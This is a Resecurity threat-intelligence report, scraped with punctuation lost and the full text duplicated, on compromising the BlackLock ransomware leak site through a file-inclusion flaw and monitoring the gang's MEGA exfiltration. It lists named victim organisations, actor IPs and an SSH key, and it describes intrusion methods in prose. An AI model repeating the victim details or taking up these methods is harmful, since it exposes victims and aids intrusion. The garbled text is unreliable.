Resecurity Blacklock Ransomware A Late Holiday Gift with Intrusion into the Threat Actors Infrastructure
pCyber Threat Intelligenceppransomware dark web hacking malware OPSEC DLS TOR cybercrimepppp
Dubbed
BlackLock
aka El
Dorado or
Eldorado
the ransomwareasaservice
RaaS outfit
has existed since March 2024 In Q4 of last year it increased its
number of data leak posts by a staggering 1425 quarteronquarter
According to independent reporting a relatively new group has
rapidly accelerated attacks and could become the most dominant RaaS
group in 2025pp
Fortunately
it will not happen due to certain events happening behind the
scenes As you may know Christmas and Winter Holidays are the
best times for cybercriminals to attack defraud and extort victims
globally But in some cases they may expect unexpected gifts too
Around that time Resecurity identified a vulnerability present at
the Data Leak Site DLS of BlackLock in the TOR network successful
exploitation of which allowed our analysts to collect substantial
intelligence about their activity outside of the public domainpp
Since
that time our analysts from the HUNTER team have been covertly
acquiring critical and previously undisclosed artifacts related to
threat actors network infrastructure logs ISPs and hosting
providers involved timestamps of logins associated filesharing
accounts at MEGA the group created to store stolen data from the
victims which later got published via DLS in TOR A successful
compromise of BlackLocks DLS allowed to uncover a trove of
information about the threat actors and their Modus Operandi MO
but more importantly to predict and prevent some of their planned
attacks and protect undisclosed victims by alerting themppIt is not enough to look at ransomware groups and design fancy reports counting the number of victims suffering from their activity Resecurity believes the proactive practical approach to disrupting cybercriminal chains is the key catalyst to combat ransomware activity worldwide Blacklock ransomware compromise is a unique case when offensive cyber combined with threat intelligence research capabilities facilitated investigation workflow to uncover critical insights and target the actors regardless of how sophisticated their operations areppLocal File Include LFI Vulnerability Exploitationpppp
As
of February
10 2025
we identified 46
victims
involving organizations from different segments of the economy
including electronics academia religious organizations defense
healthcare technology ITMSP vendors and government agencies The impacted organizations were based in Argentina Aruba Brazil Canada Congo Croatia Peru France Italy Spain the Netherlands the United States the United Kingdom and the UAEpppppp
Resecurity
has a reason to believe the actors successfully compromised a much
more significant number of victims who were currently undisclosed due
to ongoing extortion attempts by the actors or could be publishedpppppp
At
least one victim from the critical infrastructure field has not been
published at the DLS and several others have been removed from the
listing As one key communication method the group has leveraged the
email account registered via Cyberfearcom an anonymous email
service also available in TOR ppppJanuary
14 2025
Threat actors created a posting at a prominent underground community
forum dedicated to ransomware called RAMP In that posting
they announced the launch of an underground affiliate network
inviting other cybercriminals to participate in monetizing their
malicious activity by planting ransomware malicious code delivered
as binary and selling compromised accesspppp
The
posting encouraged other cybercriminals to contact the group via
private message PM via a forum Notably the posting was written in
Russian and Chinese language
ppppThe rules of the BlackLock affiliate platform warned cybercriminals who joined it not to target victims based in countries of the BRICS alliance including Russia and China as well as the Commonwealth of Independent States CIS which includes countries of postSoviet period While the latter is a typical rule for cybercriminals originating from modern Eastern Europe the reference to China is noteworthypp
The
actor behind BlackLock
Ransomware
under the alias has
links to two other ransomware projects El
Dorado and Mamona
Ransomware
This is a unique case when the same ransomware operator could
manage three
projects
successfully transitioning from one to another For example
following a successful attack against New River Electrical from
Ohio El
Dorado Ransomware actors
also targeted the College of Veterinary Medicine Kansas State
University and the City of Pensacola Florida which later got
published at BlackLock
Ransomware DLSpppp
The
web interface of El
Dorado Ransomware DLS
was different from BlackLock
Ransomwares
but they shared an almost identical list of victims This overlap may
confirm a strong connection between these ransomware projects ppppEl Dorado DLSppBlackLock DLSpppp
Independent
cybersecurity researchers have also confirmed the
connection between BlackLock
Ransomware and El
Dorado Ransomware in
code and ransomware notes It is very common for ransomware operators
to rebrand their projects in some cases this is used as an OPSEC
measure to confuse investigatorspp
March
11 2025
the actor behind BlackLock
Ransomware announced
the launch of a new project called Mamona
Ransomwarepppppp
Resecurity
identified a certain misconfiguration in the Data Leak Site DLS
of BlackLock
Ransomware
leading to clearnet IP addresses disclosure related to their network
infrastructure behind TOR hidden services hosting them and
additional service information The collected data allowed us to
assist with further investigation and disruption of this
cybercriminal activitypppppp
The
successful exploitation of Local
File Include LFI vulnerability allowed
the collection of sensitive serverside information including
configuration files and credentials pppppp
Resecurity
invested substantial time in hashcracking threat actors accounts
to take over the infrastructure pppppp
The
acquired history of commands was probably one of the biggest OPSEC
failures of Blacklock
Ransomware
The collected artifacts included copypasted credentials the key
actor managing the server used and a detailed chronology of victims
data publication pppppp
Ironically
one of the passwords copied by one of the actors managing the
BlackLock
Ransomware server
was valid for several other associated accounts used by the group pppppp
As
an additional security measure the DLS server was also protected by
a digital certificate The authorization on the server was not
possible only through a credentials set an actual digital
certificate was required to be issued by one of the administrators ppppsshauthorizedkeys fileppsshrsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDjd9zMm7DYooflblhb8b85Iq6mzwZzt7bAheyyZjcESMYWp3g6KJtZr20P3gJcN8G0KlGZ6ZrpxhfIvNAa1GQsdH4e84fg2ciTkDTudiP6aL90cR8paMoZnXvarrMg2S3legm8j1oi4B2L8xiAsyK6VfauY9Ikf4BQkyXzk9lKPhywOdmR66SbGZJP6jzFmp0hNWoirnGOs8bw413xfaxL6VRI4wqFE7ccf6wUleX7x4SnKrF7QNMr0S6EWf8LprzeSrTHCXRlOmFGurpsXn3CNmM2i5GLGdjaAvklHdniIOBXN1KuJR0mDDRpka6KIke0YbPwIjq5Fgvtn rootlocalhostpppp
Integration
with TOR was arranged using Lyrebirdobfs4proxy which implements
several pluggable transport protocols including obfs4 meek and
WebTunnelpppppp
One
of the key mechanisms of stolen data transfers was arranged via MEGA
a popular filesharing service Blacklock
Ransomware has
created multiple accounts to facilitate the storage of stolen data
from the victims pppppp
To
manage it effectively Blacklock
Ransomware used
the clone utility and in some cases it also installed the MEGA
client directly on the victims pppppp
Resecurity
has acquired substantial intelligence about email accounts associated
with MEGA folders managed by Blacklock
Ransomwarepppppp
There
were identified at least eight
accounts created
by the group in different timeframespppp
Using rclone utility BlackLock ransomware actors were moving troves of stolen data between MEGA accounts and DLSppMEGA accounts have shared the stolen data from current and historical victims At some point the actors also
used MEGA as a backup methodpppppp
Some
accounts got wiped after some time and reused to upload new stolen
data ppppJanuary
10 2025
Resecurity has contacted the Canadian
Centre for Cyber Security to
share intelligence about planned data for publication from one of the
victims based in Canada Leveraging gained access to BlackLock
Ransomware infrastructure
our team collected information about the stolen data 13
days before its publication by
the threat actorsppJanuary
16 2025Resecurity
reached out to CERTFRANSSI to
share available intelligence about planned data publication from one
of the victims based in France Leveraging the access gained our
team could collect knowledge of the stolen data two
days before publication by
the threat actors and share it with the appropriate authoritiespppp
In
that example BlackLock
Ransomware targeted
a primary legal services providerpppppp
The
observed exfiltrated data belonged to the victim and multiple
customers from the EU and abroad using their services pppppp
Notably
during the exfiltration the actors deployed the MEGA client on the
victims server to upload data covertly and evade detection pppppp
Resecurity
leveraged compromised accounts to observe the possible origin of
threat actor activitypppppp
The
most notable IP addresses were originating from China and Russia Of
course the actors could use proxies and VPN servers anonymously but
some disclosed IPs showed particular trends pppppp
One
of the most valuable files is log files revealing the IP addresses of
the bad actors from the server side SSH Some of them
overlapped with IP addresses seen for MEGA login sessionsppppIP 18514712454ppIP 218920252ppOn
January 26 2025
the actors created an additional MEGA account and added it to the
stolen data publication workflowpppp
Resecurity
monitored the accounts to detect new compromised data and identify
and alert victims at an early stage In total our threat intelligence analysts collected over 7 TB of compromised data belonging to various victimsppppFebruary
26 2025
Resecurity established contact with a BlackLock
Ransomware representative
managing the affiliate network via TOX IM ppMarch
01 2025
the actor passed a ZIP with ransomware binaries along with a
ransomware notepppp
The
provided ZIP contained six binaries a ransomware payload designed
for Windows Linux and FreeBSD and one bash script for ESXi pppppp
After
reverse engineering multiple code fragments were almost identical to
those used by another underground conglomerate DragonForce
Ransomware
Resecurity has published a detailed reverse engineering
report describing the key modulespppppp
The
only difference is that DragonForce
Ransomware samples
have been coded using VC In contrast the acquired samples
from BlackLock
Ransomware actors
were written in Go and the same pattern was applied to the El Dorado
and BlackLock combo It is possible the actors could leverage AI to
convert specific fragments of the code with minimal modifications or
modify them The observed ransom notes dropped on the victims
machine were also almost identicalpppppp
It
is unclear if BlackLock
Ransomware as
a group started cooperating with DragonForce
Ransomware
or silently transitioned under the new ownership The new masters
likely took over the project and their affiliate base because of
ransomware market consolidation understanding their previous
successors could be compromisedpp
On
February 28 2025
the key actor behind BlackLock
Ransomware suddenly
mentioned a possible exit scenario It is unclear if the
actor was aware of planned changes or suspected unexpected
events pppppp
Resecurity
may not have been the only one who identified a vulnerability in the
DLS of BlackLock and successfully exploited it On March
20 2025
the DLS of BlackLock was defaced and technically liquidated by
posting the disclosed configuration filespppppp
Notably
the hack was followed by the publication of chat presumably belonging
to BlackLock
Ransomware operators
While confirming the chats authenticity is impossible the
publicized serverside files are authentic to those acquired by
Resecurity during the winter events It seems DragonForce wanted to
shame the group and compromise their operations to eliminate
competitors On the other hand such tactics could also be used as a
false flag to further transition to a new project ppppIn parallel the day before the DLS of Mamona ransomware managed by the same actor has also been defaced The project did not last long Karol Paciorek from CSIRT KNF identified a possible clearnet IP which caused panic among affiliates Facing OPSEC failures the actor was left speechless DragonForce ransomware representative left a sarcastic comment at RAMP without providing any additional details leading to these eventspppp
Other
members of the ransomware community expressed concerns about law
enforcements possible involvement in targeting the group and their associates At the
same time the key actors continued to communicate keeping the
audience cluelesspppppp
The
key actor did
not share any surprise after incidents with BlackLock and Mamona
Ransomware It is possible the actor was fully aware that his
operations could be already compromised so the silent exit
from the previous project could be the most rational option Notably
he has not indicated any anger toward DragonForce
Ransomware representatives
opposite calling them gentlemen which may confirm
these events could be coordinated between themppppThe actor has also deleted all references to past ransomware projects and vanished DLS URLs from his signature at RAMP ppBoth BlackLock and Mamona Ransomware went offlineppDragonForce ransomware will benefit from the ransomware scene changes as one of the most robust groups having strong technical capabilities and organization Nevertheless the operators behind BlackLock El Dorado and Mamona Ransomware received a no place to hide message the cybercriminal ecosystem is extremely dynamic and adjusts to force majeure situations Obviously the group has suffered significant damage and is unlikely to be able to recover as their affiliates may be concerned about cooperating with them now due to multiple OPSEC failures ppAt the same time bigger players like DragonForce may extend a helping hand taking over their market share Resecurity released a report on the recent activity of DragonForce specifically regarding their targeting on Saudi Arabia and will continue to monitor the group It is expected that the group will accelerate its activities by building alliances with underground affiliates previously working with other ransomware operatorsppWebsiteppCompanyppCountryppDownloadsppVerticalppreesndtcappRees NDT Inspection ServicesppCanadapp5850ppBusiness ServicesppevasaircomppEVAS GroupppCanadapp71824ppAviationppakanthafrppAkanthappFrancepp388193ppLegal ServicespphasaargcomppHIDROCARBU ROS ARGENTINOS SAppArgentinapp937918ppIndustrialppdatascancomppInventory Management and Counting SolutionsppTexas United Statespp164085ppTechnologyppdgenvirocomppDG Enviro GroupppCanadapp132628ppBusiness ServicespprelateinfotechcomppRelate InfotechppUnited Kingdompp14927ppacumengroupusppAcumen GroupppCalifornia United Statespp85460ppTechnologypplightspeeddesigncomppLight Speed DesignppWashington United Statespp245339ppBusiness ServicesppkandelaarcomppKandelaar Electrotechnie kppNetherlandspp706048ppTechnologyppfbchighspringsorgppFirst Baptist ChurchppFlorida United Statespp290792ppReligious OrganizationsppwwwmidlandturbocomppMidland TurboppUnited Kingdompp669088ppTechnologyppwwwlaluckycomppLA LUCKYppBrandppCalifornia United Statespp120257ppBusiness ServicespptiendascarrioncomppTiendas Carrion FernandezppSpainpp967603ppRetailppbellstaxservicecomppBells Tax ServiceppCalifornia United Statespp533152ppBusiness ServicespppcafterhoursnetppPC AfterHoursppMinnesota United Statespp304375ppTechnologyppmyrtlebeachcustomhomebuild ercomppNations Homes Commercial Residential Construction SouthppCarolina United Statespp832767ppBusiness ServicesppphxcmpcomppThe PHOENIXppPuerto Ricopp608588ppTechnologyppbarranquitasprgovppThe Municipal Administration of Barranquitas and its Department of FinanceppPuerto Ricopp515471ppGovernmentppkeizerscappKeizers Collision CSN AutomotiveppCanadapp380486ppBusiness ServicesppcompraarubacomppCompra LTD ArubappArubapp346417ppTechnologyppbshsoftcomppBusiness Systems House FZLLCppUnited Arab Emiratespp1341397ppTechnologyppgccustommetalcomppGC Custom Metal Fabricationsoo nppCanadapp75755ppIndustrialppdatacamposcomppData Campos SistemasppBrazilpp31021ppTechnologyppcucinataglianicomppCucina TaglianippUSApp370617ppRetailppmullenwyliecomppMullen Wylie LLCppUSApp986992ppLegal ServicespppatricksanderscompanycomppPatrick Sanders and Company PCppUSApp28237ppBusiness ServicesppcityofpensacolacomppPensacolappFL USApp2106604ppGovernmentppa1mobilelockcomppA1 Mobile Lock KeyppWashington USApp38951ppBusiness ServicesppadamshomescomppAdams HomesppUSApp433175ppBusiness ServicespptankerskahrppANKERSKA PLOVIDBA ddppCroatiapp342225ppBusiness ServicesppnewriverelectricalcomppNew River Electrical CorporationppUSApp665795ppIndustrialpppanzersolutionscomppPanzer Solutions LLC Business ServicesppUSApp508720ppBusiness ServicesppavioesforzaitppavioesforzaitppItalyppVisitors 16858ppBusiness ServicesppcelplancomppCelPlan Technologies IncppUSAppVisitors 75710ppTechnologyppallianceindcomppAlliance Industries LLCppUSApp233981ppBusiness ServicesppautorecyclerscomppA L Auto RecyclersppCanadapp146942ppBusiness ServicesppburotecbizppBUROTEC SAppRepublique du Congopp21317ppBusiness ServicesppkennedyfundingcomppKennedy FundingppNew Jersey USApp 426319ppFinancial ServicesppgoughconstructioncomppGough ConstructionppUtah USApp4554ppConstructionpphtetechcomppHTE TechnologiesppMissouri USApp398790ppTechnologypplindostaritppLINDOSTARppItalypp4938ppTechnologypppremierpackagingcomppPremier PackagingppTennessee USApp16366ppBusiness ServicespptbmcgcomppTBMppConsulting Group IncppNorth Carolina USApp211568ppBusiness ServicesppuccretrievalscomppUCCppRetrievals IncppVirginia USApp170597ppBusiness ServicesppvetkstateeduppKState College of Veterinary MedicineppKS USApp13143ppEducationppatdamericancomppATDAmericanppUSApp472567ppTechnologyppfleetequipmentcomppFleet Equipment Center IncppIL USApp7982pplasencomppLasen Incpp2450 Lakeside Dr Suite B Las Cruces NM 88007 575 5225110pp25125ppDefenseppppBlackLock Ransomware What You Need To KnowhttpswwwtripwirecomstateofsecurityblacklockransomwarewhatyouneedknowResearchers Confirm BlackLock as Eldorado RebrandhttpswwwinfosecuritymagazinecomnewsresearchersconfirmblacklockBlackLock On Track to Be 2025s Most Prolific Ransomware Grouphttpswwwinfosecuritymagazinecomnewsblacklock2025smostprolificBlackLock Ransomware Hacked 40 Organization Within Two Monthshttpscybersecuritynewscomblacklockransomwarehacked40organizationppMalware AnalysisppCyber Threat IntelligenceppKeep up to date with the latest cybersecurity news and developmentsppBy subscribing I understand and agree that my personal data will be collected and processed according to the Privacy and Cookies PolicyppResecuritypp
contactresecuritycom
pp
1 888 273 82 76
ppCopyright 2025 Resecurity Inc All rights reservedp
Dubbed
BlackLock
aka El
Dorado or
Eldorado
the ransomwareasaservice
RaaS outfit
has existed since March 2024 In Q4 of last year it increased its
number of data leak posts by a staggering 1425 quarteronquarter
According to independent reporting a relatively new group has
rapidly accelerated attacks and could become the most dominant RaaS
group in 2025pp
Fortunately
it will not happen due to certain events happening behind the
scenes As you may know Christmas and Winter Holidays are the
best times for cybercriminals to attack defraud and extort victims
globally But in some cases they may expect unexpected gifts too
Around that time Resecurity identified a vulnerability present at
the Data Leak Site DLS of BlackLock in the TOR network successful
exploitation of which allowed our analysts to collect substantial
intelligence about their activity outside of the public domainpp
Since
that time our analysts from the HUNTER team have been covertly
acquiring critical and previously undisclosed artifacts related to
threat actors network infrastructure logs ISPs and hosting
providers involved timestamps of logins associated filesharing
accounts at MEGA the group created to store stolen data from the
victims which later got published via DLS in TOR A successful
compromise of BlackLocks DLS allowed to uncover a trove of
information about the threat actors and their Modus Operandi MO
but more importantly to predict and prevent some of their planned
attacks and protect undisclosed victims by alerting themppIt is not enough to look at ransomware groups and design fancy reports counting the number of victims suffering from their activity Resecurity believes the proactive practical approach to disrupting cybercriminal chains is the key catalyst to combat ransomware activity worldwide Blacklock ransomware compromise is a unique case when offensive cyber combined with threat intelligence research capabilities facilitated investigation workflow to uncover critical insights and target the actors regardless of how sophisticated their operations areppLocal File Include LFI Vulnerability Exploitationpppp
As
of February
10 2025
we identified 46
victims
involving organizations from different segments of the economy
including electronics academia religious organizations defense
healthcare technology ITMSP vendors and government agencies The impacted organizations were based in Argentina Aruba Brazil Canada Congo Croatia Peru France Italy Spain the Netherlands the United States the United Kingdom and the UAEpppppp
Resecurity
has a reason to believe the actors successfully compromised a much
more significant number of victims who were currently undisclosed due
to ongoing extortion attempts by the actors or could be publishedpppppp
At
least one victim from the critical infrastructure field has not been
published at the DLS and several others have been removed from the
listing As one key communication method the group has leveraged the
email account registered via Cyberfearcom an anonymous email
service also available in TOR ppppJanuary
14 2025
Threat actors created a posting at a prominent underground community
forum dedicated to ransomware called RAMP In that posting
they announced the launch of an underground affiliate network
inviting other cybercriminals to participate in monetizing their
malicious activity by planting ransomware malicious code delivered
as binary and selling compromised accesspppp
The
posting encouraged other cybercriminals to contact the group via
private message PM via a forum Notably the posting was written in
Russian and Chinese language
ppppThe rules of the BlackLock affiliate platform warned cybercriminals who joined it not to target victims based in countries of the BRICS alliance including Russia and China as well as the Commonwealth of Independent States CIS which includes countries of postSoviet period While the latter is a typical rule for cybercriminals originating from modern Eastern Europe the reference to China is noteworthypp
The
actor behind BlackLock
Ransomware
under the alias has
links to two other ransomware projects El
Dorado and Mamona
Ransomware
This is a unique case when the same ransomware operator could
manage three
projects
successfully transitioning from one to another For example
following a successful attack against New River Electrical from
Ohio El
Dorado Ransomware actors
also targeted the College of Veterinary Medicine Kansas State
University and the City of Pensacola Florida which later got
published at BlackLock
Ransomware DLSpppp
The
web interface of El
Dorado Ransomware DLS
was different from BlackLock
Ransomwares
but they shared an almost identical list of victims This overlap may
confirm a strong connection between these ransomware projects ppppEl Dorado DLSppBlackLock DLSpppp
Independent
cybersecurity researchers have also confirmed the
connection between BlackLock
Ransomware and El
Dorado Ransomware in
code and ransomware notes It is very common for ransomware operators
to rebrand their projects in some cases this is used as an OPSEC
measure to confuse investigatorspp
March
11 2025
the actor behind BlackLock
Ransomware announced
the launch of a new project called Mamona
Ransomwarepppppp
Resecurity
identified a certain misconfiguration in the Data Leak Site DLS
of BlackLock
Ransomware
leading to clearnet IP addresses disclosure related to their network
infrastructure behind TOR hidden services hosting them and
additional service information The collected data allowed us to
assist with further investigation and disruption of this
cybercriminal activitypppppp
The
successful exploitation of Local
File Include LFI vulnerability allowed
the collection of sensitive serverside information including
configuration files and credentials pppppp
Resecurity
invested substantial time in hashcracking threat actors accounts
to take over the infrastructure pppppp
The
acquired history of commands was probably one of the biggest OPSEC
failures of Blacklock
Ransomware
The collected artifacts included copypasted credentials the key
actor managing the server used and a detailed chronology of victims
data publication pppppp
Ironically
one of the passwords copied by one of the actors managing the
BlackLock
Ransomware server
was valid for several other associated accounts used by the group pppppp
As
an additional security measure the DLS server was also protected by
a digital certificate The authorization on the server was not
possible only through a credentials set an actual digital
certificate was required to be issued by one of the administrators ppppsshauthorizedkeys fileppsshrsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDjd9zMm7DYooflblhb8b85Iq6mzwZzt7bAheyyZjcESMYWp3g6KJtZr20P3gJcN8G0KlGZ6ZrpxhfIvNAa1GQsdH4e84fg2ciTkDTudiP6aL90cR8paMoZnXvarrMg2S3legm8j1oi4B2L8xiAsyK6VfauY9Ikf4BQkyXzk9lKPhywOdmR66SbGZJP6jzFmp0hNWoirnGOs8bw413xfaxL6VRI4wqFE7ccf6wUleX7x4SnKrF7QNMr0S6EWf8LprzeSrTHCXRlOmFGurpsXn3CNmM2i5GLGdjaAvklHdniIOBXN1KuJR0mDDRpka6KIke0YbPwIjq5Fgvtn rootlocalhostpppp
Integration
with TOR was arranged using Lyrebirdobfs4proxy which implements
several pluggable transport protocols including obfs4 meek and
WebTunnelpppppp
One
of the key mechanisms of stolen data transfers was arranged via MEGA
a popular filesharing service Blacklock
Ransomware has
created multiple accounts to facilitate the storage of stolen data
from the victims pppppp
To
manage it effectively Blacklock
Ransomware used
the clone utility and in some cases it also installed the MEGA
client directly on the victims pppppp
Resecurity
has acquired substantial intelligence about email accounts associated
with MEGA folders managed by Blacklock
Ransomwarepppppp
There
were identified at least eight
accounts created
by the group in different timeframespppp
Using rclone utility BlackLock ransomware actors were moving troves of stolen data between MEGA accounts and DLSppMEGA accounts have shared the stolen data from current and historical victims At some point the actors also
used MEGA as a backup methodpppppp
Some
accounts got wiped after some time and reused to upload new stolen
data ppppJanuary
10 2025
Resecurity has contacted the Canadian
Centre for Cyber Security to
share intelligence about planned data for publication from one of the
victims based in Canada Leveraging gained access to BlackLock
Ransomware infrastructure
our team collected information about the stolen data 13
days before its publication by
the threat actorsppJanuary
16 2025Resecurity
reached out to CERTFRANSSI to
share available intelligence about planned data publication from one
of the victims based in France Leveraging the access gained our
team could collect knowledge of the stolen data two
days before publication by
the threat actors and share it with the appropriate authoritiespppp
In
that example BlackLock
Ransomware targeted
a primary legal services providerpppppp
The
observed exfiltrated data belonged to the victim and multiple
customers from the EU and abroad using their services pppppp
Notably
during the exfiltration the actors deployed the MEGA client on the
victims server to upload data covertly and evade detection pppppp
Resecurity
leveraged compromised accounts to observe the possible origin of
threat actor activitypppppp
The
most notable IP addresses were originating from China and Russia Of
course the actors could use proxies and VPN servers anonymously but
some disclosed IPs showed particular trends pppppp
One
of the most valuable files is log files revealing the IP addresses of
the bad actors from the server side SSH Some of them
overlapped with IP addresses seen for MEGA login sessionsppppIP 18514712454ppIP 218920252ppOn
January 26 2025
the actors created an additional MEGA account and added it to the
stolen data publication workflowpppp
Resecurity
monitored the accounts to detect new compromised data and identify
and alert victims at an early stage In total our threat intelligence analysts collected over 7 TB of compromised data belonging to various victimsppppFebruary
26 2025
Resecurity established contact with a BlackLock
Ransomware representative
managing the affiliate network via TOX IM ppMarch
01 2025
the actor passed a ZIP with ransomware binaries along with a
ransomware notepppp
The
provided ZIP contained six binaries a ransomware payload designed
for Windows Linux and FreeBSD and one bash script for ESXi pppppp
After
reverse engineering multiple code fragments were almost identical to
those used by another underground conglomerate DragonForce
Ransomware
Resecurity has published a detailed reverse engineering
report describing the key modulespppppp
The
only difference is that DragonForce
Ransomware samples
have been coded using VC In contrast the acquired samples
from BlackLock
Ransomware actors
were written in Go and the same pattern was applied to the El Dorado
and BlackLock combo It is possible the actors could leverage AI to
convert specific fragments of the code with minimal modifications or
modify them The observed ransom notes dropped on the victims
machine were also almost identicalpppppp
It
is unclear if BlackLock
Ransomware as
a group started cooperating with DragonForce
Ransomware
or silently transitioned under the new ownership The new masters
likely took over the project and their affiliate base because of
ransomware market consolidation understanding their previous
successors could be compromisedpp
On
February 28 2025
the key actor behind BlackLock
Ransomware suddenly
mentioned a possible exit scenario It is unclear if the
actor was aware of planned changes or suspected unexpected
events pppppp
Resecurity
may not have been the only one who identified a vulnerability in the
DLS of BlackLock and successfully exploited it On March
20 2025
the DLS of BlackLock was defaced and technically liquidated by
posting the disclosed configuration filespppppp
Notably
the hack was followed by the publication of chat presumably belonging
to BlackLock
Ransomware operators
While confirming the chats authenticity is impossible the
publicized serverside files are authentic to those acquired by
Resecurity during the winter events It seems DragonForce wanted to
shame the group and compromise their operations to eliminate
competitors On the other hand such tactics could also be used as a
false flag to further transition to a new project ppppIn parallel the day before the DLS of Mamona ransomware managed by the same actor has also been defaced The project did not last long Karol Paciorek from CSIRT KNF identified a possible clearnet IP which caused panic among affiliates Facing OPSEC failures the actor was left speechless DragonForce ransomware representative left a sarcastic comment at RAMP without providing any additional details leading to these eventspppp
Other
members of the ransomware community expressed concerns about law
enforcements possible involvement in targeting the group and their associates At the
same time the key actors continued to communicate keeping the
audience cluelesspppppp
The
key actor did
not share any surprise after incidents with BlackLock and Mamona
Ransomware It is possible the actor was fully aware that his
operations could be already compromised so the silent exit
from the previous project could be the most rational option Notably
he has not indicated any anger toward DragonForce
Ransomware representatives
opposite calling them gentlemen which may confirm
these events could be coordinated between themppppThe actor has also deleted all references to past ransomware projects and vanished DLS URLs from his signature at RAMP ppBoth BlackLock and Mamona Ransomware went offlineppDragonForce ransomware will benefit from the ransomware scene changes as one of the most robust groups having strong technical capabilities and organization Nevertheless the operators behind BlackLock El Dorado and Mamona Ransomware received a no place to hide message the cybercriminal ecosystem is extremely dynamic and adjusts to force majeure situations Obviously the group has suffered significant damage and is unlikely to be able to recover as their affiliates may be concerned about cooperating with them now due to multiple OPSEC failures ppAt the same time bigger players like DragonForce may extend a helping hand taking over their market share Resecurity released a report on the recent activity of DragonForce specifically regarding their targeting on Saudi Arabia and will continue to monitor the group It is expected that the group will accelerate its activities by building alliances with underground affiliates previously working with other ransomware operatorsppWebsiteppCompanyppCountryppDownloadsppVerticalppreesndtcappRees NDT Inspection ServicesppCanadapp5850ppBusiness ServicesppevasaircomppEVAS GroupppCanadapp71824ppAviationppakanthafrppAkanthappFrancepp388193ppLegal ServicespphasaargcomppHIDROCARBU ROS ARGENTINOS SAppArgentinapp937918ppIndustrialppdatascancomppInventory Management and Counting SolutionsppTexas United Statespp164085ppTechnologyppdgenvirocomppDG Enviro GroupppCanadapp132628ppBusiness ServicespprelateinfotechcomppRelate InfotechppUnited Kingdompp14927ppacumengroupusppAcumen GroupppCalifornia United Statespp85460ppTechnologypplightspeeddesigncomppLight Speed DesignppWashington United Statespp245339ppBusiness ServicesppkandelaarcomppKandelaar Electrotechnie kppNetherlandspp706048ppTechnologyppfbchighspringsorgppFirst Baptist ChurchppFlorida United Statespp290792ppReligious OrganizationsppwwwmidlandturbocomppMidland TurboppUnited Kingdompp669088ppTechnologyppwwwlaluckycomppLA LUCKYppBrandppCalifornia United Statespp120257ppBusiness ServicespptiendascarrioncomppTiendas Carrion FernandezppSpainpp967603ppRetailppbellstaxservicecomppBells Tax ServiceppCalifornia United Statespp533152ppBusiness ServicespppcafterhoursnetppPC AfterHoursppMinnesota United Statespp304375ppTechnologyppmyrtlebeachcustomhomebuild ercomppNations Homes Commercial Residential Construction SouthppCarolina United Statespp832767ppBusiness ServicesppphxcmpcomppThe PHOENIXppPuerto Ricopp608588ppTechnologyppbarranquitasprgovppThe Municipal Administration of Barranquitas and its Department of FinanceppPuerto Ricopp515471ppGovernmentppkeizerscappKeizers Collision CSN AutomotiveppCanadapp380486ppBusiness ServicesppcompraarubacomppCompra LTD ArubappArubapp346417ppTechnologyppbshsoftcomppBusiness Systems House FZLLCppUnited Arab Emiratespp1341397ppTechnologyppgccustommetalcomppGC Custom Metal Fabricationsoo nppCanadapp75755ppIndustrialppdatacamposcomppData Campos SistemasppBrazilpp31021ppTechnologyppcucinataglianicomppCucina TaglianippUSApp370617ppRetailppmullenwyliecomppMullen Wylie LLCppUSApp986992ppLegal ServicespppatricksanderscompanycomppPatrick Sanders and Company PCppUSApp28237ppBusiness ServicesppcityofpensacolacomppPensacolappFL USApp2106604ppGovernmentppa1mobilelockcomppA1 Mobile Lock KeyppWashington USApp38951ppBusiness ServicesppadamshomescomppAdams HomesppUSApp433175ppBusiness ServicespptankerskahrppANKERSKA PLOVIDBA ddppCroatiapp342225ppBusiness ServicesppnewriverelectricalcomppNew River Electrical CorporationppUSApp665795ppIndustrialpppanzersolutionscomppPanzer Solutions LLC Business ServicesppUSApp508720ppBusiness ServicesppavioesforzaitppavioesforzaitppItalyppVisitors 16858ppBusiness ServicesppcelplancomppCelPlan Technologies IncppUSAppVisitors 75710ppTechnologyppallianceindcomppAlliance Industries LLCppUSApp233981ppBusiness ServicesppautorecyclerscomppA L Auto RecyclersppCanadapp146942ppBusiness ServicesppburotecbizppBUROTEC SAppRepublique du Congopp21317ppBusiness ServicesppkennedyfundingcomppKennedy FundingppNew Jersey USApp 426319ppFinancial ServicesppgoughconstructioncomppGough ConstructionppUtah USApp4554ppConstructionpphtetechcomppHTE TechnologiesppMissouri USApp398790ppTechnologypplindostaritppLINDOSTARppItalypp4938ppTechnologypppremierpackagingcomppPremier PackagingppTennessee USApp16366ppBusiness ServicespptbmcgcomppTBMppConsulting Group IncppNorth Carolina USApp211568ppBusiness ServicesppuccretrievalscomppUCCppRetrievals IncppVirginia USApp170597ppBusiness ServicesppvetkstateeduppKState College of Veterinary MedicineppKS USApp13143ppEducationppatdamericancomppATDAmericanppUSApp472567ppTechnologyppfleetequipmentcomppFleet Equipment Center IncppIL USApp7982pplasencomppLasen Incpp2450 Lakeside Dr Suite B Las Cruces NM 88007 575 5225110pp25125ppDefenseppppBlackLock Ransomware What You Need To KnowhttpswwwtripwirecomstateofsecurityblacklockransomwarewhatyouneedknowResearchers Confirm BlackLock as Eldorado RebrandhttpswwwinfosecuritymagazinecomnewsresearchersconfirmblacklockBlackLock On Track to Be 2025s Most Prolific Ransomware Grouphttpswwwinfosecuritymagazinecomnewsblacklock2025smostprolificBlackLock Ransomware Hacked 40 Organization Within Two Monthshttpscybersecuritynewscomblacklockransomwarehacked40organizationppMalware AnalysisppCyber Threat IntelligenceppKeep up to date with the latest cybersecurity news and developmentsppBy subscribing I understand and agree that my personal data will be collected and processed according to the Privacy and Cookies PolicyppResecuritypp
contactresecuritycom
pp
1 888 273 82 76
ppCopyright 2025 Resecurity Inc All rights reservedp
